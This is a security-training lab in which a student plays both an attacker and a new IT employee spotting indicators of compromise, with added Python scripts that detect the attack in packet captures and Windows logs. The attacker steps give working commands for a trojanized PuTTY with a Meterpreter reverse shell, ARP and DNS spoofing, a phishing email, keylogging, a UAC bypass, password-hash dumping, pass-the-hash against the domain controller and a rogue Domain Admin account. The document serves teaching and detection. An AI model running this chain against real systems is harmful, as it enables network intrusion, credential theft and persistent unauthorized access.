Practice Lab 10 Observing IoCs During A Security (6C)

Bobby, a new IT employee, is following onboarding instructions which include installing monitoring software on his computer. Meanwhile, a red team attacker has gained access to the company network and is performing scans to find targets. Bobby sees the scanning activity in Wireshark but is unsure if it indicates an incident. Proper training, network documentation, and incident response procedures could help Bobby determine how to respond.


Lab Activity: Observing IoCs during a Security Incident

EXAM OBJECTIVES COVERED

4.2 Given a scenario, apply the appropriate incident response procedure.
4.3 Given an incident, analyze potential indicators of compromise.

Show Slide(s): Observing IoCs During a Security Incident

Scenario

In this lab, we will simulate an incident response scenario. While not genuinely adversarial (you'll be operating both the blue and red teams), it will hopefully demonstrate the "fog of war."

The red team has gained two valuable assets through social engineering. It has been able to attach a rogue device to the internal network by gaining access to the company premises as a temporary worker, and it is aware that the company, 515support, has just taken on a new employee in its IT department: "Bobby Admin."

Teaching Tip: You can skip PC2 and allocate more RAM to another machine if you prefer. PC2 is not actively used in the lab; it is just there to appear as another host in scans.

Lab Setup

If you are completing this lab using the CompTIA Labs hosted environment, access the lab using the link provided. Note that you should follow the instructions presented in the CompTIA Labs interface, NOT the steps below. If you are completing this lab using a classroom computer, use the VMs installed to Hyper-V on your HOST computer and follow the steps below to complete the lab.

Start the VMs used in this lab in the following order, adjusting the memory allocation first if necessary, and waiting at the ellipsis for the previous VMs to finish booting before starting the next group. You do not need to connect to a VM until prompted to do so in the activity steps.

1. UTM1
2. DC1 (1024-2048 MB)
...
3. MS1 (1024-2048 MB)
...
4. PT1
5. PC1 (1024-2048 MB)

If you can allocate more than the minimum amounts of RAM, prioritize PT1 and PC1.

Lesson 6: Applying Incident Response Procedures | Topic 6C


Bobby's First Day

As Bobby sits down to work on his first day, to set up his computer as instructed, he gets a phone call.

1. Open a connection window for the PC1 VM and log on with the username bobby and password Pa$$w0rd.

2. Open a command prompt as administrator and execute the following command to install the Sysmon driver with the supplied configuration (-i), network connection logging (-n) and the EULA accepted (ignore any line breaks):

c:\labfiles\sysinternals\sysmon.exe -i c:\labfiles\sysinternals\sysmonconfig-export.xml -n -accepteula

3. Close the command prompt window.

4. Start Thunderbird and configure the account for bobby@515support.com with password Pa$$w0rd.

A cell phone call comes from the senior security analyst: "Bobby, can you open Wireshark and start recording . . .?"

5. Use the desktop shortcut to open Wireshark. Start a capture on the Ethernet interface, using the capture filter ip so that only IPv4 traffic is recorded (IPv6 is filtered out).

We don't have a SIEM set up in this lab, so we'll have to assume that the company is on high alert and advising admin staff to take extreme measures to monitor for IoCs (or perhaps something else is going on).

The Red Team Starts Their Attack Run

Teaching Tip: PT1 gets its IP address from a reservation on the DHCP server running on MS1. This is not very realistic for the scenario, but enables us to skip some tedious configuration steps.

The red team pentester ("Mal") has gained access to the premises and attached a laptop to a wall port. As Mal, you need to establish what is on the local network with you.

1. In Hyper-V Manager, right-click the PT1 VM and select Settings.

2. Select the Network Adapter node. In the right-hand pane, under Virtual switch, select vLOCAL. Click OK.

3. Open a connection window for the PT1 VM and log on with the username root and password Pa$$w0rd.

4. Open a terminal and run ifconfig.

5. In the ifconfig output, check that the IP address is the one reserved for PT1 on the MS1 DHCP server. If it is not, run dhclient to refresh the lease.

6. Run the following commands to start the database, email, and web servers you will use during the attack, and launch the Metasploit Framework:

service postgresql start
service postfix start
service apache2 start
msfconsole

7. At the msf5 prompt, execute the following scan, substituting the timing template (-T), decoy address list (-D) and target subnet used in the lab (ignore the line break and run as one command):

db_nmap -T<timing> -A -D <decoy addresses> <target subnet>
8. Switch to PC1. Perform some ordinary network operations, such as sending an email to [email protected] or to yourself, browsing the intranet at http://corp.515support.com, or checking the file share at \\DC1\labfiles.

9. Observe the Wireshark output for a minute, using the summary and analysis tools as well as watching the frame-by-frame output. Is it easy to discern whether a scan is ongoing? What is the attack machine's MAC address?

You will see a lot of ARP and SYN-only traffic from 00-15-5D-01-CA-4A, which is the MAC address you're looking for. This timing template is not that sneaky, and the decoy IP addresses are not effective when they are in such close proximity: every decoy probe still leaves the attack machine's NIC, so on the local segment they all carry the same source MAC. A slower timing template would take a lot longer to detect. Look at the Statistics > Endpoints tool and compare the number of packets to the number of bytes. The ratio will be low for 00-15-5D-01-CA-4A (around 60 bytes per packet) compared to typical usage (maybe 400 bytes per packet, depending on how enthusiastically you simulated normal network activity).

10. Stop the packet capture.

11. Bobby wonders what to do. It is obvious that someone is performing a scan on the network. Is this part of the usual IT vulnerability/threat monitoring, or is it an incident? He's not sure of the addressing scheme in place but thinks that .100s are used for workstations; that's the range his machine is in, after all. What incident response or basic security policies or security technologies could make Bobby's job easier at this point?

Bobby should be given training specific to the network systems and procedures. He might be assisted by an IDS that would trigger an alert when scanning activity is detected from an unauthorized IP. An incident response "playbook" would identify this sort of scenario and provide guidance about next steps.
Set Up a Phishing Site

Teaching Tip: PC2 might be reported as Windows XP.

Mal, the red team attacker, is getting worried. S/he has tried to use a slow scan to be stealthy, but the rogue laptop device could be discovered at any moment. Faster results are required.

1. Switch back to the PT1 VM. At the msf5 prompt, press CTRL+C to cancel the current scan if it has not completed, and run the following command against the target subnet used in the lab:

db_nmap -A <target subnet>

2. When the scan has completed, run hosts to view a summary of the hosts detected by the scan.

3. Make a note of the IP address of the PC1 VM (Bobby's machine).

Mal has a tried and trusted exploit vector in mind, but it has to be recompiled for use on the local subnet.

4. At the msf5 prompt, run the following commands. lhost is PT1's IP address and lport is the port the handler will listen on; the msfvenom build and the handler must use the same pair of values:

rm /root/Downloads/evilputty.exe
msfvenom -p windows/meterpreter/reverse_tcp lhost=<PT1 IP> lport=<port> -x /root/Downloads/putty.exe -k -f exe -o evilputty.exe
cp evilputty.exe /var/www/html
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost <PT1 IP>
set lport <port>
exploit
Run the Phishing Exploit

To try to compromise a host, we'll send a phishing email to the target persuading them to run some software from the corporate intranet. We will leverage our access to the local segment to attempt to use spoofing to resolve the hostname of the intranet server to the IP of the attack machine, which will serve the reverse TCP Trojan.

1. Still on the PT1 VM, run the following command in a new terminal:

nano /etc/ettercap/etter.dns

2. Add the following lines to the end of the file, each pointing at PT1's IP address, then save (CTRL+O) and close (CTRL+X) it:

515support.com A <PT1 IP>
*.515support.com A <PT1 IP>
update.515support.com PTR <PT1 IP>

3. Run ettercap -G.

4. Click the Sniffing at startup toggle to turn it off and click the Tick button in the toolbar.
5. Select the menu ellipse and then Hosts > Scan for hosts. When complete, select
Hosts > Hosts list.

6. Select 10.1.0.1 and click Add to Target 1, then select 10.1.0.10x (where x
completes the DHCP-assigned IP of PC1) and click Add to Target 2.

7. Select Plugins > Manage plugins and double-click dns_spoof to activate it.

8. Select the Globe icon (MITM) and then select ARP poisoning. In the dialog, check the Sniff remote connections box and click OK.

9. Click the Play icon button to start sniffing.

10. Use the desktop icon to start Thunderbird. In the dialog, select default and click Start Thunderbird.

11. In the main Thunderbird window, right-click the default profile and select Settings.

12. Change Your name to Administrator and the Email address to administrator@515suppport.com, then click OK.

Make sure you use the typo-spoofed domain part (with three Ps). Do not use a typo-spoofed domain for the link below, though.

13. Compose a message to bobby@515support.com purporting to be from the local network administrator, advising installation of the file on the corporate intranet to help deal with the ongoing incident. Make the text "corporate intranet" a hyperlink to http://update.515support.com. Send the message.

14. Close Thunderbird.

Play Along

Bobby's been told to stay alert, so he logs an incident. A few moments later the supervisor calls to advise keeping everything off grid. An intrusion is confirmed, but the attacker's level of access cannot be determined. The team is switching to out-of-band communications channels.

Moments later, the senior security analyst is on the phone again: "Bobby, we have the intruder contained. Let's see how this plays out. Follow the link, but monitor traffic coming into your machine on Wireshark."

1. Switch to the PC1 VM and restart the Wireshark capture with the same ip capture filter.

2. View the email in Thunderbird. Would the impersonated sender address be convincing if you weren't looking for it?

3. Click the link to open the site in the browser.

4. Scroll down the page and then click the link and save the evilputty.exe file to Downloads, but do not run it. Leave the prompt "Finished downloading" on the screen.

5. Switch to Wireshark and stop the capture. Locate the DNS query; it will be just before the big block of green HTTP packets. What is the IP address of the server, and what is its MAC address?

The IP address is 10.1.0.1, but that MAC address of 00-15-5D-01-CA-4A looks familiar too: the reply claims to come from the DNS server's IP, yet the frame was sent from the attack machine's NIC.
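The two packet-level IoCs this lab has Bobby spot by eye (the low bytes-per-packet, SYN-only scanner in step 9 of the attack run, and the DNS reply whose Ethernet source does not belong to 10.1.0.1 above) can be checked mechanically against a capture. The following is an added example and not part of the lab or its courseware. It assumes the capture was exported with the tshark field command shown in the comment, aggregates scan traffic per source MAC rather than per IP (so nmap -D decoys collapse onto the one NIC that sent them, the point made in the step 9 answer), and compares each frame's IP-to-MAC binding with a documented inventory. The scanner MAC is the lab's 00-15-5D-01-CA-4A; every other address, the inventory and the sample capture are constructed.

```python
"""Two link-layer IoCs from a tshark field export: a SYN scanner hiding behind
decoy source IPs, and frames whose IP-to-MAC binding contradicts the documented
inventory (ARP poisoning / spoofed DNS replies). Added example; sample data is
constructed, not captured from the lab."""
from collections import defaultdict

# Assumed export, one frame per line, tab separated (not a command from the lab):
#   tshark -r bobby.pcapng -T fields -E separator=/t \
#     -e eth.src -e ip.src -e ip.dst -e tcp.dstport -e tcp.flags -e frame.len
FIELDS = ("eth_src", "ip_src", "ip_dst", "tcp_dstport", "tcp_flags", "frame_len")
SYN, ACK = 0x002, 0x010


def parse_frames(text):
    """Turn the tab-separated export into dicts; non-TCP frames keep tcp_flags=None."""
    frames = []
    for line in text.splitlines():
        parts = line.split("\t")
        if len(parts) != len(FIELDS):
            continue  # blank or non-IP line
        f = dict(zip(FIELDS, parts))
        f["eth_src"] = f["eth_src"].lower()
        f["frame_len"] = int(f["frame_len"])
        f["tcp_flags"] = int(f["tcp_flags"], 16) if f["tcp_flags"] else None
        frames.append(f)
    return frames


def scanner_candidates(frames, max_avg_bytes=100, min_syn_ratio=0.5, min_targets=10):
    """Aggregate per source MAC, not per IP, so decoys (-D) collapse onto one NIC."""
    per_mac = defaultdict(lambda: {"packets": 0, "bytes": 0, "syn_only": 0,
                                   "targets": set(), "ips": set()})
    for f in frames:
        s = per_mac[f["eth_src"]]
        s["packets"] += 1
        s["bytes"] += f["frame_len"]
        s["ips"].add(f["ip_src"])
        if f["tcp_flags"] is not None and f["tcp_flags"] & (SYN | ACK) == SYN:
            s["syn_only"] += 1
            s["targets"].add((f["ip_dst"], f["tcp_dstport"]))
    hits = {}
    for mac, s in per_mac.items():
        avg = s["bytes"] / s["packets"]
        ratio = s["syn_only"] / s["packets"]
        if avg <= max_avg_bytes and ratio >= min_syn_ratio and len(s["targets"]) >= min_targets:
            hits[mac] = {"avg_bytes": round(avg, 1), "syn_ratio": round(ratio, 2),
                         "targets": len(s["targets"]), "source_ips": sorted(s["ips"])}
    return hits


def mac_conflicts(frames, inventory):
    """IPs seen sourced from a MAC other than the documented one (inventory: ip -> mac)."""
    seen = defaultdict(set)
    for f in frames:
        expected = inventory.get(f["ip_src"])
        if expected and expected.lower() != f["eth_src"]:
            seen[f["ip_src"]].add(f["eth_src"])
    return {ip: sorted(macs) for ip, macs in seen.items()}


# --- constructed sample: scanner MAC is the lab's; every other address is made up
SCANNER_MAC, PC1_MAC, DC1_MAC = "00:15:5d:01:ca:4a", "00:15:5d:01:ca:10", "00:15:5d:01:00:01"
INVENTORY = {"10.1.0.1": DC1_MAC, "10.1.0.101": PC1_MAC}  # the documentation Bobby lacked


def build_sample():
    rows = []
    sources = ["10.1.0.250", "10.1.0.77", "10.1.0.88"]  # real scanner IP + two decoys
    probes = ((h, p) for h in ("10.1.0.1", "10.1.0.2", "10.1.0.101")
              for p in (21, 22, 25, 53, 80, 135, 139, 443, 445, 3389))
    for i, (host, port) in enumerate(probes):
        rows.append([SCANNER_MAC, sources[i % 3], host, str(port), "0x002", "60"])
    rows.append([PC1_MAC, "10.1.0.101", "10.1.0.1", "445", "0x002", "66"])  # Bobby's SMB handshake
    rows += [[PC1_MAC, "10.1.0.101", "10.1.0.1", "445", "0x018", "400"]] * 20
    rows.append([SCANNER_MAC, "10.1.0.1", "10.1.0.101", "", "", "90"])  # DNS reply "from" 10.1.0.1
    return "\n".join("\t".join(r) for r in rows) + "\n"


if __name__ == "__main__":
    frames = parse_frames(build_sample())
    print(scanner_candidates(frames))
    print(mac_conflicts(frames, INVENTORY))
```

The scanner is reported once, with all three source IPs (and the spoofed 10.1.0.1) hanging off the same MAC, and the DNS reply shows up as an IP-to-MAC conflict only because an inventory exists to compare against; without one, a full MITM forwards the genuine server's traffic through the same NIC and nothing in the capture alone contradicts itself.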

6. On the PT1 VM, note the DNS responses that Ettercap is spoofing.

7. In Ettercap select Mitm (Globe icon) > Stop Mitm attack(s). Click OK.

8. Close Ettercap.

Navigate the OODA Loop


What the attacker doesn't realize in this scenario is that he has been enticed into a
honeypot, and the "Blue Team" are setting up resources to monitor the attack as it
happens.
As you complete this part of the lab, think about the OODA loop—Observe, Orient,
Decide, Act. Think about how each team should adjust tactics based on what is known.
1. Switch to the PC1 VM. Start a new packet capture with the same ip capture filter.

2. Run c:\labfiles\sysinternals\procexp.exe. Accept the EULA.

3. Switch back to the browser and from the prompt "Finished downloading," click the Run button. Click Run at the SmartScreen prompt.

4. Select Process Explorer again. Add the User Name and Integrity Level fields. Note that the malware has been started as a child process of the browser.

5. Right-click the evilputty.exe process and select Properties. Select the TCP/IP tab. Note that the process has opened a network connection. Click OK.

6. Acting on instinct, take a look at the properties of onedrive.exe, paying particular attention to private bytes, threads, strings, and network connections (if any). You do not have to write everything down; just try to get an impression of what the process is using currently.

7. If possible, arrange the VM windows so that you can view both PT1 and PC1 at the same time, so as to keep an eye on Process Explorer.

8. Make a note of the local system time on PC1 to help you to correlate the following
intrusion activity to logged events at the end of the lab.

Observe and Orient


We will move the listener from the fairly obtrusive evilputty.exe to a less noticeable
program. Looking through the list, onedrive.exe is quite a good choice as it is not
usually closed down by the user and would not attract so much attention if shown to
be connecting with the network, though the endpoints and possibly ports are always
going to be suspicious.
1. Assume the role of Mal again and switch to the PT1 VM. Note that Meterpreter has started the handler and opened a prompt.

2. Run the following commands:

getuid
ps

Note that the attacker can see that Wireshark is running a packet capture. Proceeding at this point may be a little foolhardy.

3. Make a note of the PID of onedrive.exe (5704 in the example above), then run the following commands, substituting pid for the actual value:

migrate pid
keyscan_start

The second command starts to monitor keystrokes on the target.

4. On PC1, observe what happens. Check the properties of onedrive.exe for changes.

5. On PC1, open a command prompt and run the following command:

netstat -bonp TCP

6. Curse your forgetfulness, open an administrative prompt, and run the same command. Note that the original evilputty PID is listed as the process connected to the handler's port on PT1.

7. Back on PT1, run keyscan_dump to check what the user has been doing.

Note that the keys from the first command prompt are captured, but not what you typed into the administrative prompt. The current malicious process has a medium integrity level and cannot communicate with the high-integrity cmd process. Better privileges are required.

Decide and Act


As Mal, you decide that this network seems so wide open it would be foolish not to
proceed.
1. Switch to the PT1 VM. Run the following command in Meterpreter:

getsystem

This will fail, as the current account does not have sufficient privileges.

2. Run the following commands to try another exploit module. lhost is PT1's IP address, lport is a new listening port, and the session number is the one shown in the sessions list:

background
use windows/local/bypassuac_comhijack
set payload windows/x64/meterpreter/reverse_tcp
set lhost <PT1 IP>
set lport <port>
sessions
set session <session ID>
exploit

If it doesn't work, try running exploit again.

3. If the exploit succeeds, run the following two commands to get system privileges, and dump the local password hash store:

getsystem
hashdump

4. Click-and-drag to select the Administrator account's hash string, between the 500: (the account's RID) and the trailing :::. Right-click the selection and select Copy.

5. Run the following commands to use the captured hash in a psexec attack against the network's Domain Controller:

background
back
use exploit/windows/smb/psexec
set rhost <DC1 IP>
set payload windows/x64/meterpreter/reverse_tcp
set lhost <PT1 IP>
set lport <port>
set smbdomain 515support
set smbuser administrator

6. Type set smbpass, right-click and select Paste selection, and then press ENTER.

7. Type exploit and press ENTER.

8. You should now have a Meterpreter shell on the DC. Run the following commands to exploit this fact:

getuid
hashdump
shell
net user admiin Pa$$w0rd /add /domain
net group "Domain Admins" admiin /add /domain

A wide grin spreads across Mal's face, but then a shadow falls across the laptop screen and a firm hand grips a shoulder. "Very competent effort at breaking into our honeypot."

Lessons-Learned Report

Review some of the evidence you have collected as the attack was allowed to progress.

1. Stop the Wireshark capture. Can you learn anything about the attack from the packet contents, other than the endpoints and ports used? Close Wireshark when you have finished.

No, the traffic is encrypted.

2. Right-click Start and select Event Viewer. Expand Applications and Services Logs > Microsoft > Windows > Sysmon > Operational.

3. Note the following events:

a) Process Create (event ID 1) and Network connection (event ID 3) events when evilputty.exe was launched.

b) A CreateRemoteThread (event ID 8) event when the Meterpreter shell was migrated to the onedrive.exe process (attack.mitre.org/techniques/T1055).

c) A sequence of Process Create events where the user legitimately executed a command prompt as administrator, prompting the consent.exe process to perform the UAC elevation.

d) A Registry value set (event ID 13) event followed by Process Create events where the bypassuac_comhijack module performed its UAC bypass by COM hijacking (attack.mitre.org/techniques/T1088).

e) Registry value set events followed by Process Create events where the GETSYSTEM script exploits named pipes (cmd.exe /c echo ylscvl > \\.\pipe\ylscvl) to obtain system-level privileges.
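The event sequence in step 3 is what a detection rule set should recover from the Sysmon log without a person clicking through Event Viewer. The following is an added example, not code from the lab or from Sysinternals: it parses the <Event> XML that wevtutil emits for the Microsoft-Windows-Sysmon/Operational channel and correlates events 1, 3, 8 and 13 into the chain above, treating a CLSID InprocServer32 write followed by a high-integrity process with no consent.exe in between as the COM-hijack bypass (c versus d). The evilputty.exe and onedrive.exe paths follow the lab; the browser, parent processes, timestamps, SID, CLSID and C2 address in the sample log are constructed.

```python
"""Correlate PC1's Sysmon operational log into the lab's attack chain:
browser-spawned dropper (ID 1) and its beacon (ID 3), thread injection into
onedrive.exe (ID 8), the CLSID InprocServer32 write of the COM-hijack UAC
bypass (ID 13) followed by a high-integrity process, and the getsystem
named-pipe trick in a command line. Added example; input is the <Event>
sequence `wevtutil qe Microsoft-Windows-Sysmon/Operational /f:xml` prints,
and the sample log below is constructed rather than exported from PC1."""
import re
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
CLSID_HIJACK = re.compile(r"\\Software\\Classes\\CLSID\\\{[0-9A-Fa-f-]+\}\\InprocServer32", re.I)
PIPE_ECHO = re.compile(r"echo\s+\S+\s*>\s*\\\\\.\\pipe\\", re.I)


def parse_sysmon_xml(text):
    """wevtutil prints bare <Event> elements; wrap them so they parse as one document."""
    events = []
    for ev in ET.fromstring("<Events>" + text + "</Events>").findall("e:Event", NS):
        rec = {"EventID": int(ev.find("e:System/e:EventID", NS).text)}
        for d in ev.findall("e:EventData/e:Data", NS):
            rec[d.get("Name")] = d.text or ""
        events.append(rec)
    return events


def base(path):
    return path.rsplit("\\", 1)[-1].lower()


def analyze(events):
    """Return (finding, UtcTime, detail) tuples in log order."""
    findings, droppers, hijack_time = [], set(), None
    for ev in events:
        eid, t = ev["EventID"], ev.get("UtcTime", "")
        if eid == 1:
            image, parent = ev.get("Image", ""), ev.get("ParentImage", "")
            cmd = ev.get("CommandLine", "")
            if base(parent) in BROWSERS and "\\downloads\\" in image.lower():
                droppers.add(image.lower())
                findings.append(("browser-launched download", t, image))
            if PIPE_ECHO.search(cmd):
                findings.append(("named-pipe impersonation (getsystem)", t, cmd))
            if base(image) == "consent.exe":
                hijack_time = None  # a real UAC prompt: the next High process is legitimate
            elif ev.get("IntegrityLevel") == "High" and hijack_time and t > hijack_time:
                findings.append(("elevated process after CLSID hijack (T1088)", t, image))
                hijack_time = None
        elif eid == 3 and ev.get("Image", "").lower() in droppers:
            findings.append(("dropper network connection", t,
                             f"{ev['Image']} -> {ev.get('DestinationIp')}:{ev.get('DestinationPort')}"))
        elif eid == 8:
            findings.append(("remote thread injection (T1055)", t,
                             f"{ev.get('SourceImage')} -> {ev.get('TargetImage')} (pid {ev.get('TargetProcessId')})"))
        elif eid == 13 and CLSID_HIJACK.search(ev.get("TargetObject", "")):
            hijack_time = t
            findings.append(("CLSID InprocServer32 write", t, ev["TargetObject"]))
    return findings


# --- constructed sample log: dropper and OneDrive paths follow the lab; the browser,
# --- parent processes, times, SID, CLSID and C2 address are made up
def ev(eid, utc, **data):
    fields = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{eid}</EventID></System>'
            f'<EventData><Data Name="UtcTime">{utc}</Data>{fields}</EventData></Event>')


DL = r"C:\Users\bobby\Downloads\evilputty.exe"
OD = r"C:\Users\bobby\AppData\Local\Microsoft\OneDrive\OneDrive.exe"
SYS = r"C:\Windows\System32"
SAMPLE_LOG = "".join([
    ev(1, "2020-05-01 10:00:05.000", Image=DL, ParentImage=r"C:\Program Files\Mozilla Firefox\firefox.exe",
       CommandLine=DL, IntegrityLevel="Medium"),
    ev(3, "2020-05-01 10:00:06.000", Image=DL, DestinationIp="10.1.0.250", DestinationPort="4444"),
    ev(8, "2020-05-01 10:01:00.000", SourceImage=DL, TargetImage=OD, TargetProcessId="5704"),
    ev(1, "2020-05-01 10:02:00.000", Image=SYS + r"\consent.exe", ParentImage=SYS + r"\svchost.exe",
       CommandLine="consent.exe", IntegrityLevel="System"),
    ev(1, "2020-05-01 10:02:03.000", Image=SYS + r"\cmd.exe", ParentImage=r"C:\Windows\explorer.exe",
       CommandLine="cmd.exe", IntegrityLevel="High"),
    ev(13, "2020-05-01 10:05:00.000", Image=OD, TargetObject=r"HKU\S-1-5-21-1-2-3-1104\Software\Classes"
       r"\CLSID\{00000000-0000-0000-0000-000000000000}\InprocServer32\(Default)"),
    ev(1, "2020-05-01 10:05:01.000", Image=SYS + r"\cmd.exe", ParentImage=SYS + r"\dllhost.exe",
       CommandLine="cmd.exe", IntegrityLevel="High"),
    ev(1, "2020-05-01 10:06:00.000", Image=SYS + r"\cmd.exe", ParentImage=SYS + r"\cmd.exe",
       CommandLine=r"cmd.exe /c echo ylscvl > \\.\pipe\ylscvl", IntegrityLevel="High"),
])

if __name__ == "__main__":
    for kind, when, detail in analyze(parse_sysmon_xml(SAMPLE_LOG)):
        print(f"{when}  {kind}: {detail}")
```

The legitimate "run as administrator" at 10:02 produces no finding because consent.exe appears first; the 10:05 high-integrity process does, because the only thing preceding it is a medium-integrity process writing an InprocServer32 value under HKU.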

4. Optionally, log on to DC1 and observe the Security log. Note event 4776 (Credential Validation). This appears when an account is validated by NTLM rather than Kerberos. Note the generic "WORKSTATION" host name. The details for the subsequent 4672 (Special privileges assigned to log-on) and 4624 (Log-on) events also show log-on type 3 (network) and the use of the NTLM authentication package. You may want to compare these to earlier valid Kerberos log-on events. The null SID ones are due to the guest account being enabled on the domain.

5. Subsequent events (principally 4720 and 4728) show the user account creation and group modification activity.

Observing the use of pass the hash via event logs on the domain controller. Note that the account is authenticated by NTLM, not Kerberos, and that a placeholder computer name is used. (Screenshot used by permission from Microsoft.)
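Steps 4 and 5 describe the pattern by which pass-the-hash and its follow-on persistence show up on the DC: an NTLM network logon from a workstation name that matches nothing in the inventory, privileges assigned to that logon, then an account created and added to Domain Admins under the same logon ID. The following is an added example, not from the lab or from Microsoft, that applies that correlation to Security-log events represented as dicts (the shape a SIEM or Get-WinEvent export delivers). The known-workstation list, logon IDs, SIDs and the source IP are constructed; the null-SID anonymous logons the page mentions are deliberately skipped so that guest-account noise does not trigger it.

```python
"""Correlate domain-controller Security-log events into the
pass-the-hash-then-persist pattern: NTLM network logon (4776/4624) from a host
not in the asset inventory, special privileges (4672), account creation (4720)
and a group membership change (4728) under the same logon ID. Added example;
events are dicts as a SIEM or `Get-WinEvent | ConvertTo-Json` would give them,
and the sample is constructed, not captured from DC1."""

KNOWN_WORKSTATIONS = {"PC1", "MS1", "DC1"}  # constructed inventory of domain hosts
ANONYMOUS_SID = "S-1-0-0"                   # null SID: anonymous/guest noise


def correlate(events):
    """Return {TargetLogonId: finding} for suspicious NTLM network logons,
    enriched with what that logon session went on to do."""
    validations = [e for e in events if e["EventID"] == 4776]
    sessions = {}
    for e in events:
        eid = e["EventID"]
        if eid == 4624:
            if e.get("TargetUserSid") == ANONYMOUS_SID:
                continue  # the page's "null SID" entries: expected while guest is enabled
            if e.get("LogonType") != "3" or e.get("AuthenticationPackageName") != "NTLM":
                continue  # interactive or Kerberos logons are not this pattern
            ws = e.get("WorkstationName", "")
            if ws.upper() in KNOWN_WORKSTATIONS:
                continue
            user = e["TargetUserName"]
            seen_4776 = any(v.get("TargetUserName", "").lower() == user.lower()
                            and v.get("Workstation", "") == ws for v in validations)
            sessions[e["TargetLogonId"]] = {
                "user": user, "workstation": ws, "ip": e.get("IpAddress", ""),
                "validated_by_4776": seen_4776, "privileged": False, "actions": []}
        else:
            lid = e.get("SubjectLogonId")
            if lid not in sessions:
                continue
            if eid == 4672:
                sessions[lid]["privileged"] = True
            elif eid == 4720:
                sessions[lid]["actions"].append(("account created", e["TargetUserName"]))
            elif eid == 4728:
                sessions[lid]["actions"].append(("added to " + e["TargetUserName"], e["MemberName"]))
    return sessions


def verdict(sessions):
    """One reason per line for each suspicious session, in the order the evidence arrived."""
    out = {}
    for lid, s in sessions.items():
        reasons = [f"NTLM network logon as {s['user']} from undocumented host "
                   f"{s['workstation'] or '?'} ({s['ip']})"]
        if s["privileged"]:
            reasons.append("special privileges assigned to the session (4672)")
        for what, who in s["actions"]:
            reasons.append(f"persistence: {what} {who}")
        out[lid] = reasons
    return out


# constructed sample in log order; logon IDs, SIDs and the source IP are made up
PTH = "0x1a2b3c"
SAMPLE_EVENTS = [
    {"EventID": 4624, "TargetUserName": "bobby", "TargetUserSid": "S-1-5-21-1-2-3-1104",
     "LogonType": "3", "AuthenticationPackageName": "Kerberos", "WorkstationName": "PC1",
     "TargetLogonId": "0x9001", "IpAddress": "10.1.0.101"},
    {"EventID": 4624, "TargetUserName": "ANONYMOUS LOGON", "TargetUserSid": ANONYMOUS_SID,
     "LogonType": "3", "AuthenticationPackageName": "NTLM", "WorkstationName": "",
     "TargetLogonId": "0x9002", "IpAddress": "10.1.0.101"},
    {"EventID": 4776, "PackageName": "MICROSOFT_AUTHENTICATION_PACKAGE_V1_0",
     "TargetUserName": "administrator", "Workstation": "WORKSTATION", "Status": "0x0"},
    {"EventID": 4624, "TargetUserName": "administrator", "TargetUserSid": "S-1-5-21-1-2-3-500",
     "LogonType": "3", "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V2",
     "WorkstationName": "WORKSTATION", "TargetLogonId": PTH, "IpAddress": "10.1.0.250"},
    {"EventID": 4672, "SubjectUserName": "administrator", "SubjectLogonId": PTH,
     "PrivilegeList": "SeDebugPrivilege SeBackupPrivilege"},
    {"EventID": 4720, "SubjectUserName": "administrator", "SubjectLogonId": PTH,
     "TargetUserName": "admiin"},
    {"EventID": 4728, "SubjectUserName": "administrator", "SubjectLogonId": PTH,
     "TargetUserName": "Domain Admins", "MemberName": "CN=admiin,CN=Users,DC=515support,DC=com"},
]

if __name__ == "__main__":
    for lid, reasons in verdict(correlate(SAMPLE_EVENTS)).items():
        print(lid, *reasons, sep="\n  ")
```

Keying everything on the logon ID is what ties the 4720/4728 back to the NTLM logon; a rule that only alerted on "4624, type 3, NTLM" would fire on every legitimate NTLM fallback, while one that only alerted on Domain Admins changes would not say where the actor came from.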

Close the Lab

Discard changes made to the VMs in this lab.

• Switch to the Hyper-V Manager console on the HOST.

• For each VM that is running, right-click and select Revert to set the configuration back to the saved checkpoint.